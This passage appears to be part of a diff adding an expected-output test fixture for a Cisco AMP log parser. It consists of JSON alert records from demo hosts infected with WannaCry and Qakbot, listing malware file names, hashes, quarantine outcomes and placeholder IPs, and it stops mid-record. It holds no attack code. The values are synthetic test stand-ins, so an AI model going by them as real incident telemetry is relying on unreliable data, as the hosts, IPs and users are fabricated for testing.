"file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34828, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + 
"45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 313000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36357, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + 
"process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40152, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41272, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": 
"cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 42392, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 43512, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + 
"Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 44698, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": 
"test_connector_guid", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45884, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47070, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51525, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 52645, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + 
"cisco.amp.timestamp_nanoseconds": 199000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662859016176000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 65285, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:31.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 856000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662854721208000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 66208, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241035", + 
"cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 233000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 67131, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 68332, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 69533, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + 
"10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 74502, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": 
"W32.File.MalParent", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 77209, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 79928, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + 
